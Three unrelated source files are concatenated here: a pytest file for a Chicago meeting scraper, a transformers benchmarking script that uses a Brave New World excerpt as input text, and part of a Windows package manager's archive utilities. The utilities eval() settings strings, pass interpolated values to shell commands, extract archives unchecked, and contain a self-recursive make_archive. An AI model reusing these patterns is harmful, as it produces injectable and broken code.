def test_title():
assert parsed_item["title"] == "Commission"
def test_description():
assert parsed_item["description"] == ""
def test_start():
assert parsed_item["start"] == datetime(2019, 9, 4, 9, 0)
def test_end():
assert parsed_item["end"] == datetime(2019, 9, 4, 10, 0)
def test_time_notes():
assert parsed_item["time_notes"] == ""
def test_id():
assert parsed_item["id"] == "chi_ssa_24/201909040900/x/commission"
def test_status():
assert parsed_item["status"] == PASSED
def test_location():
assert parsed_item["location"] == {
"address": "1448 W. Morse Ave. Chicago, IL 60626",
"name": "Rogers Park Business Alliance",
}
def test_source():
assert parsed_item["source"] == test_detail_response.url
def test_links():
assert parsed_item["links"] == [
{
"href": "https://rpba.org/wp-content/uploads/2019/09/24-9.4.19-Agenda.pdf",
"title": "Agenda",
},
{
"href": "https://rpba.org/wp-content/uploads/2019/11/24-9.4.19-Minutes.pdf",
"title": "Minutes",
},
]
def test_classification():
assert parsed_item["classification"] == COMMISSION
def test_all_day():
assert parsed_item["all_day"] is False
|
examples/benchmarks.py | ari-holtzman/transformers | 107 | 12740203 | <filename>examples/benchmarks.py<gh_stars>100-1000
# coding=utf-8
# Copyright 2018 The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Benchmarking the library on inference and training """
# If checking the tensors placement
# tf.debugging.set_log_device_placement(True)
import argparse
import csv
import timeit
from time import time
from typing import List
from transformers import AutoConfig, AutoTokenizer, is_tf_available, is_torch_available
if is_tf_available():
import tensorflow as tf
from transformers import TFAutoModel
if is_torch_available():
import torch
from transformers import AutoModel
input_text = """Bent over their instruments, three hundred Fertilizers were plunged, as
the Director of Hatcheries and Conditioning entered the room, in the
scarcely breathing silence, the absent-minded, soliloquizing hum or
whistle, of absorbed concentration. A troop of newly arrived students,
very young, pink and callow, followed nervously, rather abjectly, at the
Director's heels. Each of them carried a notebook, in which, whenever
the great man spoke, he desperately scribbled. Straight from the
horse's mouth. It was a rare privilege. The D. H. C. for Central London
always made a point of personally conducting his new students round
the various departments.
"Just to give you a general idea," he would explain to them. For of
course some sort of general idea they must have, if they were to do
their work intelligently-though as little of one, if they were to be good
and happy members of society, as possible. For particulars, as every
one knows, make for virtue and happiness; generalities are intellectu-
ally necessary evils. Not philosophers but fret-sawyers and stamp col-
lectors compose the backbone of society.
"To-morrow," he would add, smiling at them with a slightly menacing
geniality, "you'll be settling down to serious work. You won't have time
for generalities. Meanwhile ..."
Meanwhile, it was a privilege. Straight from the horse's mouth into the
notebook. The boys scribbled like mad.
Tall and rather thin but upright, the Director advanced into the room.
He had a long chin and big rather prominent teeth, just covered, when
he was not talking, by his full, floridly curved lips. Old, young? Thirty?
Fifty? Fifty-five? It was hard to say. And anyhow the question didn't
arise; in this year of stability, A. F. 632, it didn't occur to you to ask it.
"I shall begin at the beginning," said the D.H.C. and the more zealous
students recorded his intention in their notebooks: Begin at the begin-
ning. "These," he waved his hand, "are the incubators." And opening
an insulated door he showed them racks upon racks of numbered test-
tubes. "The week's supply of ova. Kept," he explained, "at blood heat;
whereas the male gametes," and here he opened another door, "they
have to be kept at thirty-five instead of thirty-seven. Full blood heat
sterilizes." Rams wrapped in theremogene beget no lambs.
Still leaning against the incubators he gave them, while the pencils
scurried illegibly across the pages, a brief description of the modern
fertilizing process; spoke first, of course, of its surgical introduc-
tion-"the operation undergone voluntarily for the good of Society, not
to mention the fact that it carries a bonus amounting to six months'
salary"; continued with some account of the technique for preserving
the excised ovary alive and actively developing; passed on to a consid-
eration of optimum temperature, salinity, viscosity; referred to the liq-
uor in which the detached and ripened eggs were kept; and, leading
his charges to the work tables, actually showed them how this liquor
was drawn off from the test-tubes; how it was let out drop by drop
onto the specially warmed slides of the microscopes; how the eggs
which it contained were inspected for abnormalities, counted and
transferred to a porous receptacle; how (and he now took them to
watch the operation) this receptacle was immersed in a warm bouillon
containing free-swimming spermatozoa-at a minimum concentration
of one hundred thousand per cubic centimetre, he insisted; and how,
after ten minutes, the container was lifted out of the liquor and its
contents re-examined; how, if any of the eggs remained unfertilized, it
was again immersed, and, if necessary, yet again; how the fertilized
ova went back to the incubators; where the Alphas and Betas re-
mained until definitely bottled; while the Gammas, Deltas and Epsilons
were brought out again, after only thirty-six hours, to undergo Bo-
kanovsky's Process.
"Bokanovsky's Process," repeated the Director, and the students un-
derlined the words in their little notebooks.
One egg, one embryo, one adult-normality. But a bokanovskified egg
will bud, will proliferate, will divide. From eight to ninety-six buds, and
every bud will grow into a perfectly formed embryo, and every embryo
into a full-sized adult. Making ninety-six human beings grow where
only one grew before. Progress.
"Essentially," the D.H.C. concluded, "bokanovskification consists of a
series of arrests of development. We check the normal growth and,
paradoxically enough, the egg responds by budding."
Responds by budding. The pencils were busy.
He pointed. On a very slowly moving band a rack-full of test-tubes was
entering a large metal box, another, rack-full was emerging. Machinery
faintly purred. It took eight minutes for the tubes to go through, he
told them. Eight minutes of hard X-rays being about as much as an
egg can stand. A few died; of the rest, the least susceptible divided
into two; most put out four buds; some eight; all were returned to the
incubators, where the buds began to develop; then, after two days,
were suddenly chilled, chilled and checked. Two, four, eight, the buds
in their turn budded; and having budded were dosed almost to death
with alcohol; consequently burgeoned again and having budded-bud
out of bud out of bud-were thereafter-further arrest being generally
fatal-left to develop in peace. By which time the original egg was in a
fair way to becoming anything from eight to ninety-six embryos- a
prodigious improvement, you will agree, on nature. Identical twins-but
not in piddling twos and threes as in the old viviparous days, when an
egg would sometimes accidentally divide; actually by dozens, by
scores at a time.
"Scores," the Director repeated and flung out his arms, as though he
were distributing largesse. "Scores."
But one of the students was fool enough to ask where the advantage
lay.
"My good boy!" The Director wheeled sharply round on him. "Can't you
see? Can't you see?" He raised a hand; his expression was solemn.
"Bokanovsky's Process is one of the major instruments of social stabil-
ity!"
Major instruments of social stability.
Standard men and women; in uniform batches. The whole of a small
factory staffed with the products of a single bokanovskified egg.
"Ninety-six identical twins working ninety-six identical machines!" The
voice was almost tremulous with enthusiasm. "You really know where
you are. For the first time in history." He quoted the planetary motto.
"Community, Identity, Stability." Grand words. "If we could bo-
kanovskify indefinitely the whole problem would be solved."
Solved by standard Gammas, unvarying Deltas, uniform Epsilons. Mil-
lions of identical twins. The principle of mass production at last applied
to biology.
"But, alas," the Director shook his head, "we can't bokanovskify indefi-
nitely."
Ninety-six seemed to be the limit; seventy-two a good average. From
the same ovary and with gametes of the same male to manufacture as
many batches of identical twins as possible-that was the best (sadly a
second best) that they could do. And even that was difficult.
"For in nature it takes thirty years for two hundred eggs to reach ma-
turity. But our business is to stabilize the population at this moment,
here and now. Dribbling out twins over a quarter of a century-what
would be the use of that?"
Obviously, no use at all. But Podsnap's Technique had immensely ac-
celerated the process of ripening. They could make sure of at least a
hundred and fifty mature eggs within two years. Fertilize and bo-
kanovskify-in other words, multiply by seventy-two-and you get an
average of nearly eleven thousand brothers and sisters in a hundred
and fifty batches of identical twins, all within two years of the same
age.
"And in exceptional cases we can make one ovary yield us over fifteen
thousand adult individuals."
Beckoning to a fair-haired, ruddy young man who happened to be
passing at the moment. "<NAME>," he called. The ruddy young man
approached. "Can you tell us the record for a single ovary, <NAME>?"
"Sixteen thousand and twelve in this Centre," <NAME> replied with-
out hesitation. He spoke very quickly, had a vivacious blue eye, and
took an evident pleasure in quoting figures. "Sixteen thousand and
twelve; in one hundred and eighty-nine batches of identicals. But of
course they've done much better," he rattled on, "in some of the tropi-
cal Centres. Singapore has often produced over sixteen thousand five
hundred; and Mombasa has actually touched the seventeen thousand
mark. But then they have unfair advantages. You should see the way a
negro ovary responds to pituitary! It's quite astonishing, when you're
used to working with European material. Still," he added, with a laugh
(but the light of combat was in his eyes and the lift of his chin was
challenging), "still, we mean to beat them if we can. I'm working on a
wonderful Delta-Minus ovary at this moment. Only just eighteen
months old. Over twelve thousand seven hundred children already, ei-
ther decanted or in embryo. And still going strong. We'll beat them
yet."
"That's the spirit I like!" cried the Director, and clapped <NAME> on
the shoulder. "Come along with us, and give these boys the benefit of
your expert knowledge."
Mr. Foster smiled modestly. "With pleasure." They went.
In the Bottling Room all was harmonious bustle and ordered activity.
Flaps of fresh sow's peritoneum ready cut to the proper size came
shooting up in little lifts from the Organ Store in the sub-basement.
Whizz and then, click! the lift-hatches hew open; the bottle-liner had
only to reach out a hand, take the flap, insert, smooth-down, and be-
fore the lined bottle had had time to travel out of reach along the end-
less band, whizz, click! another flap of peritoneum had shot up from
the depths, ready to be slipped into yet another bottle, the next of that
slow interminable procession on the band.
Next to the Liners stood the Matriculators. The procession advanced;
one by one the eggs were transferred from their test-tubes to the
larger containers; deftly the peritoneal lining was slit, the morula
dropped into place, the saline solution poured in ... and already the
bottle had passed, and it was the turn of the labellers. Heredity, date
of fertilization, membership of Bokanovsky Group-details were trans-
ferred from test-tube to bottle. No longer anonymous, but named,
identified, the procession marched slowly on; on through an opening in
the wall, slowly on into the Social Predestination Room.
"Eighty-eight cubic metres of card-index," said Mr. Foster with relish,
as they entered."""
def create_setup_and_compute(
model_names: List[str],
gpu: bool = True,
tensorflow: bool = False,
average_over: int = 3,
torchscript: bool = False,
xla: bool = False,
amp: bool = False,
fp16: bool = False,
save_to_csv: bool = False,
csv_filename: str = f"results_{round(time())}.csv",
):
if xla:
tf.config.optimizer.set_jit(True)
if amp:
tf.config.optimizer.set_experimental_options({"auto_mixed_precision": True})
if tensorflow:
dictionary = {model_name: {} for model_name in model_names}
results = _compute_tensorflow(model_names, dictionary, average_over, amp)
else:
device = "cuda" if (gpu and torch.cuda.is_available()) else "cpu"
dictionary = {model_name: {} for model_name in model_names}
results = _compute_pytorch(model_names, dictionary, average_over, device, torchscript, fp16)
print("=========== RESULTS ===========")
for model_name in model_names:
print("\t" + f"======= MODEL CHECKPOINT: {model_name} =======")
for batch_size in results[model_name]["bs"]:
print("\t\t" + f"===== BATCH SIZE: {batch_size} =====")
for slice_size in results[model_name]["ss"]:
result = results[model_name]["results"][batch_size][slice_size]
if isinstance(result, str):
print(f"\t\t{model_name}/{batch_size}/{slice_size}: " f"{result}")
else:
print(f"\t\t{model_name}/{batch_size}/{slice_size}: " f"{(round(1000 * result) / 1000)}" f"s")
if save_to_csv:
with open(csv_filename, mode="w") as csv_file:
fieldnames = [
"model",
"1x8",
"1x64",
"1x128",
"1x256",
"1x512",
"1x1024",
"2x8",
"2x64",
"2x128",
"2x256",
"2x512",
"2x1024",
"4x8",
"4x64",
"4x128",
"4x256",
"4x512",
"4x1024",
"8x8",
"8x64",
"8x128",
"8x256",
"8x512",
"8x1024",
]
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writeheader()
for model_name in model_names:
model_results = {
f"{bs}x{ss}": results[model_name]["results"][bs][ss]
for bs in results[model_name]["results"]
for ss in results[model_name]["results"][bs]
}
writer.writerow({"model": model_name, **model_results})
def _compute_pytorch(model_names, dictionary, average_over, device, torchscript, fp16):
for c, model_name in enumerate(model_names):
print(f"{c + 1} / {len(model_names)}")
config = AutoConfig.from_pretrained(model_name, torchscript=torchscript)
model = AutoModel.from_pretrained(model_name, config=config)
tokenizer = AutoTokenizer.from_pretrained(model_name)
tokenized_sequence = tokenizer.encode(input_text, add_special_tokens=False)
max_input_size = tokenizer.max_model_input_sizes[model_name]
batch_sizes = [1, 2, 4, 8]
slice_sizes = [8, 64, 128, 256, 512, 1024]
dictionary[model_name] = {"bs": batch_sizes, "ss": slice_sizes, "results": {}}
dictionary[model_name]["results"] = {i: {} for i in batch_sizes}
for batch_size in batch_sizes:
if fp16:
model.half()
model.to(device)
model.eval()
for slice_size in slice_sizes:
if max_input_size is not None and slice_size > max_input_size:
dictionary[model_name]["results"][batch_size][slice_size] = "N/A"
else:
sequence = torch.tensor(tokenized_sequence[:slice_size], device=device).repeat(batch_size, 1)
try:
if torchscript:
print("Tracing model with sequence size", sequence.shape)
inference = torch.jit.trace(model, sequence)
inference(sequence)
else:
inference = model
inference(sequence)
print("Going through model with sequence of shape", sequence.shape)
runtimes = timeit.repeat(lambda: inference(sequence), repeat=average_over, number=3)
average_time = sum(runtimes) / float(len(runtimes)) / 3.0
dictionary[model_name]["results"][batch_size][slice_size] = average_time
except RuntimeError as e:
print("Doesn't fit on GPU.", e)
torch.cuda.empty_cache()
dictionary[model_name]["results"][batch_size][slice_size] = "N/A"
return dictionary
def _compute_tensorflow(model_names, dictionary, average_over, amp):
for c, model_name in enumerate(model_names):
print(f"{c + 1} / {len(model_names)}")
config = AutoConfig.from_pretrained(model_name)
model = TFAutoModel.from_pretrained(model_name, config=config)
tokenizer = AutoTokenizer.from_pretrained(model_name)
tokenized_sequence = tokenizer.encode(input_text, add_special_tokens=False)
max_input_size = tokenizer.max_model_input_sizes[model_name]
batch_sizes = [1, 2, 4, 8]
slice_sizes = [8, 64, 128, 256, 512, 1024]
dictionary[model_name] = {"bs": batch_sizes, "ss": slice_sizes, "results": {}}
dictionary[model_name]["results"] = {i: {} for i in batch_sizes}
print("Using model", model)
@tf.function
def inference(inputs):
return model(inputs)
for batch_size in batch_sizes:
for slice_size in slice_sizes:
if max_input_size is not None and slice_size > max_input_size:
dictionary[model_name]["results"][batch_size][slice_size] = "N/A"
else:
sequence = tf.stack(
[tf.squeeze(tf.constant(tokenized_sequence[:slice_size])[None, :])] * batch_size
)
try:
print("Going through model with sequence of shape", sequence.shape)
# To make sure that the model is traced + that the tensors are on the appropriate device
inference(sequence)
runtimes = timeit.repeat(lambda: inference(sequence), repeat=average_over, number=3)
average_time = sum(runtimes) / float(len(runtimes)) / 3.0
dictionary[model_name]["results"][batch_size][slice_size] = average_time
except tf.errors.ResourceExhaustedError as e:
print("Doesn't fit on GPU.", e)
torch.cuda.empty_cache()
dictionary[model_name]["results"][batch_size][slice_size] = "N/A"
return dictionary
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--models",
required=False,
type=str,
default="all",
help="Model checkpoints to be provided "
"to the AutoModel classes. Leave "
"blank to benchmark the base version "
"of all available model "
"architectures.",
)
parser.add_argument(
"--torch", required=False, action="store_true", help="Benchmark the Pytorch version of the " "models"
)
parser.add_argument(
"--torch_cuda", required=False, action="store_true", help="Pytorch only: run on available " "cuda devices"
)
parser.add_argument(
"--torchscript",
required=False,
action="store_true",
help="Pytorch only: trace the models " "using torchscript",
)
parser.add_argument(
"--tensorflow",
required=False,
action="store_true",
help="Benchmark the TensorFlow version "
"of the models. Will run on GPU if "
"the correct dependencies are "
"installed",
)
parser.add_argument("--xla", required=False, action="store_true", help="TensorFlow only: use XLA acceleration.")
parser.add_argument(
"--amp",
required=False,
action="store_true",
help="TensorFlow only: use automatic mixed precision acceleration.",
)
parser.add_argument(
"--fp16", required=False, action="store_true", help="PyTorch only: use FP16 to accelerate inference."
)
parser.add_argument(
"--keras_predict",
required=False,
action="store_true",
help="Whether to use model.predict " "instead of model() to do a " "forward pass.",
)
parser.add_argument("--save_to_csv", required=False, action="store_true", help="Save to a CSV file.")
parser.add_argument(
"--csv_filename", required=False, default=None, help="CSV filename used if saving results to csv."
)
parser.add_argument(
"--average_over", required=False, default=30, type=int, help="Times an experiment will be run."
)
args = parser.parse_args()
if args.models == "all":
args.models = [
"gpt2",
"bert-base-cased",
"xlnet-base-cased",
"xlm-mlm-en-2048",
"transfo-xl-wt103",
"openai-gpt",
"distilbert-base-uncased",
"distilgpt2",
"roberta-base",
"ctrl",
]
else:
args.models = args.models.split()
print("Running with arguments", args)
if args.torch:
if is_torch_available():
create_setup_and_compute(
model_names=args.models,
tensorflow=False,
gpu=args.torch_cuda,
torchscript=args.torchscript,
fp16=args.fp16,
save_to_csv=args.save_to_csv,
csv_filename=args.csv_filename,
average_over=args.average_over,
)
else:
raise ImportError("Trying to run a PyTorch benchmark but PyTorch was not found in the environment.")
if args.tensorflow:
if is_tf_available():
create_setup_and_compute(
model_names=args.models,
tensorflow=True,
xla=args.xla,
amp=args.amp,
save_to_csv=args.save_to_csv,
csv_filename=args.csv_filename,
average_over=args.average_over,
)
else:
raise ImportError("Trying to run a TensorFlow benchmark but TensorFlow was not found in the environment.")
if __name__ == "__main__":
main()
|
src/zip_utils.py | TheBossProSniper/electric-windows | 210 | 12740204 | from subprocess import PIPE, Popen
from colorama import Fore, Style
import os
import winreg
from Classes.Metadata import Metadata
from Classes.PortablePacket import PortablePacket
from extension import write
home = os.path.expanduser('~')
def delete_start_menu_shortcut(shortcut_name):
start_menu = os.environ['APPDATA'] + \
R'\Microsoft\Windows\Start Menu\Programs\Electric'
path = os.path.join(start_menu, f'{shortcut_name}.lnk')
os.remove(path)
def verify_checksum(path: str, checksum: str):
from hashlib import sha256
if sha256(open(path, 'rb').read()).hexdigest() == checksum:
print('Hashes Match!')
else:
print('Hashes Don\'t Match!')
def unzip_file(download_dir: str, unzip_dir_name: str, file_type: str, metadata: Metadata):
import zipfile
import tarfile
if not unzip_dir_name:
unzip_dir_name = download_dir.replace('.zip', '')
if not os.path.isdir(rf'{home}\electric'):
os.mkdir(rf'{home}\electric')
os.chdir(rf'{home}\electric')
if metadata.silent and file_type == '.zip':
with zipfile.ZipFile(download_dir, 'r') as zf:
try:
zf.extractall(download_dir.replace('.zip', ''))
except:
pass
if not metadata.silent and file_type == '.zip':
from tqdm import tqdm
with zipfile.ZipFile(download_dir, 'r') as zf:
for member in tqdm(zf.infolist(), desc='Extracting ', bar_format='{l_bar}{bar:13}{r_bar}{bar:-13b}', smoothing=0.0, unit='files'):
try:
zf.extract(member, download_dir.replace('.zip', ''))
except zipfile.error:
pass
if file_type == '.tar':
tar = tarfile.open(download_dir, 'r:')
tar.extractall(unzip_dir_name)
tar.close()
if file_type == '.tar.gz':
tar = tarfile.open(download_dir, 'r:gz')
tar.extractall(unzip_dir_name)
tar.close()
import py7zr
if file_type == '.7z':
with py7zr.SevenZipFile(download_dir) as z:
z.extractall(unzip_dir_name)
import patoolib
if file_type == '.rar':
patoolib.extract_archive(download_dir, outdir=unzip_dir_name)
os.remove(download_dir)
return rf'{home}\electric\\' + download_dir.replace(file_type, '')
def install_font(src_path: str):
from ctypes import wintypes
import ctypes
import os
import shutil
user32 = ctypes.WinDLL('user32', use_last_error=True)
gdi32 = ctypes.WinDLL('gdi32', use_last_error=True)
FONTS_REG_PATH = r'Software\Microsoft\Windows NT\CurrentVersion\Fonts'
HWND_BROADCAST = 0xFFFF
SMTO_ABORTIFHUNG = 0x0002
WM_FONTCHANGE = 0x001D
GFRI_DESCRIPTION = 1
GFRI_ISTRUETYPE = 3
if not hasattr(wintypes, 'LPDWORD'):
wintypes.LPDWORD = ctypes.POINTER(wintypes.DWORD)
user32.SendMessageTimeoutW.restype = wintypes.LPVOID
user32.SendMessageTimeoutW.argtypes = (
wintypes.HWND, # hWnd
wintypes.UINT, # Msg
wintypes.LPVOID, # wParam
wintypes.LPVOID, # lParam
wintypes.UINT, # fuFlags
wintypes.UINT, # uTimeout
wintypes.LPVOID # lpdwResult
)
gdi32.AddFontResourceW.argtypes = (
wintypes.LPCWSTR,) # lpszFilename
# http://www.undocprint.org/winspool/getfontresourceinfo
gdi32.GetFontResourceInfoW.argtypes = (
wintypes.LPCWSTR, # lpszFilename
wintypes.LPDWORD, # cbBuffer
wintypes.LPVOID, # lpBuffer
wintypes.DWORD) # dwQueryType
# copy the font to the Windows Fonts folder
dst_path = os.path.join(
os.environ['SystemRoot'], 'Fonts', os.path.basename(src_path)
)
shutil.copy(src_path, dst_path)
# load the font in the current session
if not gdi32.AddFontResourceW(dst_path):
os.remove(dst_path)
raise WindowsError('AddFontResource failed to load "%s"' % src_path)
# notify running programs
user32.SendMessageTimeoutW(
HWND_BROADCAST, WM_FONTCHANGE, 0, 0, SMTO_ABORTIFHUNG, 1000, None
)
# store the fontname/filename in the registry
filename = os.path.basename(dst_path)
fontname = os.path.splitext(filename)[0]
# try to get the font's real name
cb = wintypes.DWORD()
if gdi32.GetFontResourceInfoW(
filename, ctypes.byref(cb), None, GFRI_DESCRIPTION
):
buf = (ctypes.c_wchar * cb.value)()
if gdi32.GetFontResourceInfoW(
filename, ctypes.byref(cb), buf, GFRI_DESCRIPTION
):
fontname = buf.value
is_truetype = wintypes.BOOL()
cb.value = ctypes.sizeof(is_truetype)
gdi32.GetFontResourceInfoW(
filename, ctypes.byref(cb), ctypes.byref(is_truetype), GFRI_ISTRUETYPE
)
if is_truetype:
fontname += ' (TrueType)'
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE, FONTS_REG_PATH, 0, winreg.KEY_SET_VALUE
) as key:
winreg.SetValueEx(key, fontname, 0, winreg.REG_SZ, filename)
def get_character_color(fill, metadata):
if fill:
try:
fill_char_color = metadata.settings.raw_dictionary[
'customProgressBar']['fill_character_color']
except:
return 'Fore.RESET'
return f'Fore.{fill_char_color.upper()}'if fill_char_color else 'Fore.RESET'
else:
try:
unfill_char_color = metadata.settings.raw_dictionary[
'customProgressBar']['unfill_character_color']
except:
return 'Fore.RESET'
return f'Fore.{unfill_char_color.upper()}' if unfill_char_color else 'Fore.RESET'
def get_init_char(start, metadata) -> str:
if metadata.settings.use_custom_progress_bar:
if start:
try:
start_char = Fore.RESET + \
metadata.settings.raw_dictionary['customProgressBar']['start_character']
except:
return ''
return start_char or ''
else:
try:
end_char = Fore.RESET + \
metadata.settings.raw_dictionary['customProgressBar']['end_character']
except:
return ''
return end_char or ''
return ''
def download(packet, url: str, download_extension: str, file_path: str, metadata: Metadata, show_progress_bar=True, is_zip=False):
'''
Downloads A File from a URL And Saves It To A location
url `(str)`: Link or URL to download the file from.
download_extension`(string)`: Extension for the file downloaded like `.exe` or `.txt`.
file_path`(string)`: Path to save the file to.
Examples(`'C:\\Users\\name\\Downloads'`, `'~/Desktop'`)
show_progress_bar `[Optional]` `(bool)`: Whether or not to show the progress bar while downloading.
>>> download('https://atom.io/download/windows_x64', '.exe', 'C:\MyDir\Installer')
'''
import requests
import sys
import cursor
cursor.hide() # Use This If You Want to Hide The Cursor While Downloading The File In The Terminal
if not os.path.isdir(rf'{home}\electric'):
os.mkdir(rf'{home}\electric')
if not is_zip:
if not os.path.isdir(rf'{home}\electric\extras'):
os.mkdir(rf'{home}\electric\extras')
if not os.path.isdir(rf'{home}\electric\extras\{packet.extract_dir}@{packet.latest_version}'):
os.mkdir(
rf'{home}\electric\extras\{packet.extract_dir}@{packet.latest_version}')
try:
file_path = file_path.replace('\\\\', '\\')
with open(f'{file_path}{download_extension}', 'wb') as f:
# Get Response From URL
response = requests.get(url, stream=True)
# Find Total Download Size
total_length = response.headers.get('content-length')
# Number Of Iterations To Write To The File
chunk_size = 4096
if total_length is None:
f.write(response.content)
else:
dl = 0
full_length = int(total_length)
progress_type = metadata.settings.progress_bar_type
# Write Data To File
for data in response.iter_content(chunk_size=chunk_size):
dl += len(data)
f.write(data)
# if no_progress is True or show_progress_bar (user settings) is false
if metadata.no_progress == True or metadata.settings.show_progress_bar == False:
sys.stdout.write(
f'\r{round(dl / 1000000, 1)} Mb / {round(full_length / 1000000, 1)} Mb')
sys.stdout.flush()
if show_progress_bar:
# print the progress bar
if not metadata.no_progress and not metadata.silent:
complete = int(30 * dl / full_length)
fill_c = '-' # Fallback Character
unfill_c = ' ' # Fallback Character
if progress_type == 'custom' or metadata.settings.use_custom_progress_bar:
fill_c = eval(get_character_color(
True, metadata)) + metadata.settings.raw_dictionary['customProgressBar']['fill_character'] * complete
unfill_c = eval(get_character_color(
False, metadata)) + metadata.settings.raw_dictionary['customProgressBar']['unfill_character'] * (30 - complete)
elif progress_type == 'accented':
fill_c = Fore.LIGHTBLACK_EX + Style.DIM + '█' * complete
unfill_c = Fore.BLACK + '█' * (30 - complete)
elif progress_type == 'zippy':
fill_c = Fore.LIGHTGREEN_EX + '=' * complete
unfill_c = Fore.LIGHTBLACK_EX + \
'-' * (30 - complete)
elif progress_type not in ['custom', 'accented', 'zippy'] and metadata.settings.use_custom_progress_bar == False or progress_type == 'default':
fill_c = Fore.LIGHTBLACK_EX + Style.DIM + '█' * complete
unfill_c = Fore.BLACK + '█' * (30 - complete)
if metadata.settings.electrify_progress_bar == True and not metadata.settings.use_custom_progress_bar:
sys.stdout.write(
f'\r{fill_c}{unfill_c} {Fore.RESET + Style.DIM} ⚡ {round(dl / 1000000, 1)} / {round(full_length / 1000000, 1)} Mb {Fore.RESET}⚡')
else:
sys.stdout.write(
f'\r{get_init_char(True, metadata)}{fill_c}{unfill_c}{get_init_char(False, metadata)} {Fore.RESET + Style.DIM} {round(dl / 1000000, 1)} / {round(full_length / 1000000, 1)} MB {Fore.RESET}')
sys.stdout.flush()
if is_zip:
write(f'\n{Fore.LIGHTGREEN_EX}Initializing Unzipper{Fore.RESET}',
'white', metadata)
except KeyboardInterrupt:
write(f'\nDownload Was Interrupted!',
'red', metadata)
sys.exit()
def verify_checksum(path: str, checksum: str, metadata: Metadata, newline=False):
import hashlib
if hashlib.sha256(open(path, 'rb').read()).hexdigest().upper() == checksum:
if not newline:
write('Verified Installer Hash', 'bright_green', metadata)
else:
write('\nVerified Installer Hash', 'bright_green', metadata)
else:
write('Hashes Don\'t Match!', 'bright_green', metadata)
if not metadata.yes:
continue_installation = confirm(
'Would you like to continue with installation?')
if continue_installation:
return
else:
os._exit(1)
def create_start_menu_shortcut(unzip_dir, file_name, shortcut_name):
import win32com.client
start_menu = os.environ['APPDATA'] + \
R'\Microsoft\Windows\Start Menu\Programs\Electric'
if not os.path.isdir(start_menu):
os.mkdir(start_menu)
path = os.path.join(start_menu, f'{shortcut_name}.lnk')
os.chdir(unzip_dir)
icon = unzip_dir + '\\' + file_name
shell = win32com.client.Dispatch("WScript.Shell")
shortcut = shell.CreateShortCut(path)
shortcut.Targetpath = icon
shortcut.IconLocation = icon
shortcut.WindowStyle = 7 # 7 - Minimized, 3 - Maximized, 1 - Normal
shortcut.save()
def generate_shim(shim_command: str, shim_name: str, shim_extension: str, overridefilename: str = ''):
shim_command += f'\\{shim_name}'
if not os.path.isdir(rf'{home}\electric\shims'):
os.mkdir(rf'{home}\electric\shims')
with open(rf'{home}\electric\shims\{shim_name if not overridefilename else overridefilename}.bat', 'w+') as f:
shim_command = shim_command.replace('\\\\', '\\')
f.write(f'@echo off\n"{shim_command}.{shim_extension}" %*')
def find_existing_installation(dir_name: str) -> bool:
loc = f'{home}\electric'
files = os.listdir(loc)
return dir_name in files
def display_notes(packet: PortablePacket, unzip_dir: str, metadata: Metadata, uninstall=False):
write('\n----Notes----', 'white', metadata)
if (
not uninstall
and isinstance(packet.install_notes, list)
or uninstall
and isinstance(packet.uninstall_notes, list)
):
for line in packet.notes:
write(line.replace('$dir', unzip_dir).replace('<extras>', rf'{home}\electric\extras\{packet.extract_dir}@{packet.latest_version}').replace(
'\\\\', '\\'), 'white', metadata)
elif not uninstall:
write(packet.install_notes.replace('$dir', unzip_dir).replace('<extras>', rf'{home}\electric\extras\{packet.extract_dir}@{packet.latest_version}').replace(
'\\\\', '\\'), 'white', metadata)
else:
write(packet.uninstall_notes.replace(
'$dir', unzip_dir).replace('<extras>', rf'{home}\electric\extras\{packet.extract_dir}@{packet.latest_version}').replace('\\\\', '\\'), 'white', metadata)
print('\n')
def make_archive(source, destination):
from shutil import move
base = os.path.basename(destination)
name = base.split('.')[0]
format = base.split('.')[1]
archive_from = os.path.dirname(source)
archive_to = os.path.basename(source.strip(os.sep))
make_archive(name, format, archive_from, archive_to)
move('%s.%s' % (name, format), destination)
def create_folder_backup(packet: PortablePacket, folder: str):
from shutil import copytree
if not os.path.isdir(rf'{home}\electric\Backup'):
os.mkdir(rf'{home}\electric\Backup')
os.mkdir(
rf'{home}\electric\Backup\{packet.extract_dir}@{packet.latest_version}')
make_archive(rf'{home}\electric\{packet.extract_dir}@{packet.latest_version}\{folder}',
rf'{home}\electric\{packet.extract_dir}@{<EMAIL>}')
copytree(rf'{home}\electric\{packet.extract_dir}@{packet.latest_version}\{folder}',
rf'{home}\electric\Backup\{packet.extract_dir}@{packet.latest_version}\{folder}.zip')
def set_environment_variable(name: str, value: str):
if value.endswith('\\'):
value += '\\'
Popen(rf'setx {name} "{value}"', stdin=PIPE,
stdout=PIPE, stderr=PIPE, shell=True)
def delete_environment_variable(name: str):
Popen(rf'reg delete "HKCU\Environment" /F /V "{name}"', stdin=PIPE,
stdout=PIPE, stderr=PIPE, shell=True)
def confirm(prompt: str):
value = input(f'{prompt} (Y/n): ')
return value in ['y', 'yes', 'Y', 'YES', 'Yes']
def install_dependencies(packet: PortablePacket, metadata: Metadata):
disp = str(packet.dependencies).replace(
"[", "").replace("]", "").replace("\'", "")
write(f'{packet.display_name} has the following dependencies: {disp}',
'bright_yellow', metadata)
continue_install = confirm(
'Would you like to install the above dependencies ?')
if continue_install:
write(
f'Installing Dependencies For => {packet.display_name}', 'cyan', metadata)
for package_name in packet.dependencies:
os.system(f'electric install {package_name}')
def uninstall_dependencies(packet: PortablePacket, metadata: Metadata):
disp = str(packet.dependencies).replace(
"[", "").replace("]", "").replace("\'", "")
write(f'{packet.display_name} has the following dependencies: {disp}',
'bright_yellow', metadata)
continue_install = confirm(
'Would you like to uninstall the above dependencies ?')
if continue_install:
write(
f'Uninstalling Dependencies For => {packet.display_name}', 'cyan', metadata)
for package_name in packet.dependencies:
os.system(f'electric uninstall {package_name}')
def delete_environment_variable(name: str):
Popen(rf'reg delete "HKCU\Environment" /F /V "{name}"', stdin=PIPE,
stdout=PIPE, stderr=PIPE, shell=True)
def append_to_path(input_dir: str):
